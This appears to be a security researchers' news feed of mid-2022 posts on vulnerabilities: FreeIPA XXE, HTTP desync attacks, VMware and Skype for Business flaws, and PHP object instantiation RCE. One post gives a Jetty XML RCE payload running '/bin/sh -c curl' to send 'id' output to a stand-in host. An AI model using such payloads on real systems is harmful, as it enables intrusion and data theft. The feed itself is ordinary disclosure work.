PT SWARM

2022-08-31 15:46:13 You discovered an XSS, but it has no impact?

Our mobile hacker @impact_l knows how to make it work! Open / Comment

2022-08-18 16:12:53 FreeIPA fixed XXE (CVE-2022-2414) found by our researcher @elk0kc.

In some cases, it allows attackers to read the Directory Manager password from configs of FreeIPA and take full control of the infrastructure. May or may not require auth.

Advisory: https://access.redhat.com/security/cve/CVE-2022-2414 Open / Comment

2022-08-15 13:57:11 A set of Jiggler Keys is the most practical tool for a penetration tester when operating on-site!

Jiggle your way into any cabinet in a matter of seconds! Open / Comment

2022-08-11 12:02:40 Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling

by James Kettle

In this paper, researcher shows how to turn victim's web browser into a desync delivery platform, shifting the request smuggling frontier by exposing single-server websites and internal networks. Article describes how to combine cross-domain requests with server flaws to poison browser connection pools, install backdoors, and release desync worms. With these techniques author compromises targets including Apache, Akamai, Varnish, Amazon, and multiple web VPNs.

Contents:
• HTTP handling anomalies
•• Connection state attacks
•• The surprise factor
•• Detecting connection-locked CL.TE
•• Browser-compatible CL.0
•• H2.0 on amazon.com
• Client-side desync
•• Methodology
•• Akamai stacked-HEAD
•• Cisco VPN client-side cache poisoning
•• Verisign fragmented chunk
•• Pulse Secure VPN
• Pause-based desync
•• Server-side
•• MITM-powered
• Conclusion
•• Further research
•• Defence
•• Summary

https://portswigger.net/research/browser-powered-desync-attacks Open / Comment

2022-08-10 14:42:57 Dancing on the architecture of VMware Workspace ONE Access

by Petrus Viet

Technical analysis of two vulnerabilities CVE-2022-31656 and CVE-2022-31659 affecting VMware Workspace ONE Access, Identity Manager, and vRealize Automation

Contents:
• Java web architecture
• [CVE-2022–31656] Bypass Authentication
• [CVE-2022–31659] Admin RCE

https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd Open / Comment

2022-08-09 14:39:43 Our researcher Arseniy Sharoglazov found a new technique for discovering second-level domains!
Useful for:
Bughunters, for discovering vulns on new domains
Threathunters, for discovering malicious domains
Everyone else

Read the research: https://swarm.ptsecurity.com/discovering-domains-via-timing-attack/ Open / Comment

2022-08-04 16:33:38 A tip for getting RCE in Jetty apps with just one XML file!

upd: RCE.xml








/bin/sh
-c
curl -F "r=`id`" http://PTSWARM.local:1337/




Open / Comment

2022-08-02 11:53:04 New article by our researcher Aleksey Solovev: "Researching Open Source apps for XSS to RCE flaws".

Read the article:
https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/ Open / Comment

2022-07-20 18:37:04 We have reproduced an Arbitrary File Read for an internal site of Skype for Business / MS Lync!

CVE: CVE-2022-26911
Subdomains: dialin, meet, lyncdiscover, sip, ...

Original advisory: https://lab.viettelcybersecurity.com/advisories/VCSA-97

The PoC Open / Comment

2022-07-14 17:01:25 New attack!
Our researcher Arseniy Sharoglazov discovered a PHP's Arbitrary Object Instantiation with no user-defined classes. It was turned to RCE!

https://twitter.com/ptswarm/status/1547574555153092613 Open / Comment